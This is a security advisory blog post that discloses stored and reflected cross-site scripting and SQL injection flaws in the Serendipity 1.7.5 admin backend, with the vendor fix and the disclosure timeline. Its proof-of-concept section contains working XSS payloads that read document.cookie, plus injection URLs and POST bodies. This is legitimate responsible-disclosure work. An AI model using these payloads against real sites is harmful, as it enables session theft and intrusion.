• Home
  • References
  • Wiki
  • About me
  • Imprint

Feb 6: SSCHADV2014-003 - Serendipity 1.7.5 (Backend) - Multiple security vulnerabilities

Advisory:
Serendipity 1.7.5 (Backend) – Multiple security vulnerabilities
Advisory ID:
SSCHADV2014-003
Author:
Stefan Schurtz
Affected Software:
Successfully tested on Serendipity 1.7.5
Vendor URL:
http://www.s9y.org/
Vendor Status:
fixed
 
======================
Vulnerability Description
======================
 
The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities
 
 
======================
PoC-Exploit
======================

// Stored-XSS with "Real name"
 
(1) Login as "Standard editor" user
(2) Under "Personal Settings" set your "Real name" to "><script>alert(document.cookie)</script>

The XSS will be executed for the Administrator if he manages the users (Backend -> Administration -> Manage users)

// SQL-Injection – with "serendipity[install_plugin]"
 
http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=[SQLi]

// Reflected XSS_1 – "serendipity[install_plugin]"
 
http://[target]/s/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524’%3b<script>alert(1)</script>%2f%2f912

// Reflected XSS_2 – "serendipity[id]"
 
POST http://[target]/serendipity/serendipity_admin.php?

serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D="><script>alert(document.cookie)<%2fscript>&serendipity%5Btimestamp%5D=1391086127&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=0fb9473e000f67c7d530e0698c8ff2dc&serendipity%5Btitle%5D=test1&serendipity%5Bisdraft%5D=false&serendipity%5Bchk_timestamp%5D=1391086127&serendipity%5Bnew_timestamp%5D=2014-01-30+13%3A48&serendipity%5Bcategories%5D%5B%5D=0&serendipity%5Bbody%5D=test1&serendipity%5Ballow_comments%5D=true&serendipity%5Bextended%5D=

// Reflected XSS_3 – "serendipity[timestamp]"
 
POST http://[target]/serendipity/serendipity_admin.php?

serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D="><script>alert(document.cookie)<%2fscript>&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=d9e231ef9eaeb5e58336806484de7600&serendipity%5Btitle%5D=test&serendipity%5Bisdraft%5D=false&serendipity%5Bchk_timestamp%5D=1391084636&serendipity%5Bnew_timestamp%5D=2014-01-30+13%3A23&serendipity%5Bcategories%5D%5B%5D=0&serendipity%5Bbody%5D=test%3Cstrong%3E%3C%2Fstrong%3E%3Cblockquote%3E%3C%2Fblockquote%3E&serendipity%5Ballow_comments%5D=true&serendipity%5Bmoderate_comments%5D=true&serendipity%5Bextended%5D

======================
Solution
======================

Upgrade to the latest version Serendipity 1.7.7

======================
Disclosure Timeline
======================

30-Jan-2014 – developer informed by email
30-Jan-2014 – feedback from developer
31-Jan-2014 – testing first diff
03-Feb-2014 – testing second diff
04-Feb-2014 – testing diff tested
06-Feb-2014 – release of Serendipity 1.7.7

======================
Credits
======================

Vulnerabilities found and advisory written by Stefan Schurtz.

======================
References
======================

http://s9y.org/
http://blog.s9y.org/archives/253-Serendipity-1.7.7-released.html
http://www.darksecurity.de/advisories/2014/SSCHADV2014-003.txt
Geschrieben von Stefan Schurtz in Security Advisories Kommentare: (0) Trackbacks: (0)
Tags für diesen Artikel: advisory, cross site scripting, security, sicherheit, sql injection, xss
Zuletzt bearbeitet am 06.02.2014 19:59

Trackbacks
Trackback-URL für diesen Eintrag

Keine Trackbacks

Kommentare
Ansicht der Kommentare: (Linear | Verschachtelt)

Noch keine Kommentare


Kommentar schreiben


Um maschinelle und automatische Übertragung von Spamkommentaren zu verhindern, bitte die Zeichenfolge im dargestellten Bild in der Eingabemaske eintragen. Nur wenn die Zeichenfolge richtig eingegeben wurde, kann der Kommentar angenommen werden. Bitte beachten Sie, dass Ihr Browser Cookies unterstützen muss, um dieses Verfahren anzuwenden.
CAPTCHA 1CAPTCHA 2CAPTCHA 3CAPTCHA 4CAPTCHA 5


Textile-Formatierung erlaubt
Sie können [geshi lang=LANG][/lang] Tags verwenden um Quellcode abhängig von der gewählten Programmiersprache einzubinden
 
Kommentare werden erst nach redaktioneller Prüfung freigeschaltet!
 

Kalender

Zurück February '19
Mo Tu We Th Fr Sa Su
        1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28      

Suche

Categories

  • XML Allgemein
  • XML Bug Bounty
  • XML Cisco
  • XML Coding
  • XML Fachartikel
  • XML Forensics
  • XML Hacking Challenge
  • XML IT-Security
  • XML Kryptographie
  • XML Network Monitoring
  • XML OpenBSD
  • XML Reverse Engineering
  • XML Security Advisories
  • XML Steganographie


Alle Kategorien

taggs

xml abra xml ACL xml adobe xml advisory xml apple.com xml artikel xml buffer overflow xml bug bounty xml bypass xml challenges xml cheat sheet xml check point xml Cisco xml coding xml cross site request forgery xml cross site scripting xml dcfldd xml denial of service xml directory traversal xml dos xml forensics xml full path disclosure xml heise xml http xml icinga xml infoserve xml IPv6 xml lfi xml linux reader xml markplaats.nl xml metasploit xml nagios xml omniture xml OpenBSD xml open redirection xml OpenSSH xml owasp xml proxy xml reverse engineering xml RIPv2 xml saar xml saarland xml security xml Sicherheit xml SNMP xml sql injection xml steganographie xml store.apple.com xml sven xml xss

Exploit-DB updates by Offensive Security

[dos] Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process

Monday, February 18. 2019
[dos] Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass

Monday, February 18. 2019
[dos] Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions

Monday, February 18. 2019
[dos] Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour

Monday, February 18. 2019
[webapps] Comodo Dome Firewall 2.7.0 - Cross-Site Scripting

Monday, February 18. 2019

OpenBSD Journal

Faster vlan(4) forwarding? - blog post by mpi@

Tuesday, February 19. 2019
openrsync imported into the tree

Monday, February 11. 2019
Florian Obser on unwind(8)

Monday, January 28. 2019
Security Vulnerability Mitigations

Saturday, January 26. 2019
Support for 2TB of memory added

Monday, January 21. 2019
join-ing any open wifi network is now possible

Sunday, January 20. 2019
vmm(4) for i386 deleted from -current

Sunday, January 20. 2019
OpenBSD on the Acer Aspire One, At Ten

Sunday, January 20. 2019
New console font Spleen made default

Thursday, January 10. 2019

Archives

  • February 2019
  • January 2019
  • December 2018
  • Das Neueste ...
  • Älteres ...

Verwaltung des Blogs

Login

Syndicate This Blog

  • XML RSS 0.91 feed
  • XML RSS 1.0 feed
  • XML RSS 2.0 feed
  • ATOM/XML ATOM 1.0 feed
  • XML RSS 2.0 Kommentare
 

Layout by Andreas Viklund | Serendipity template by Carl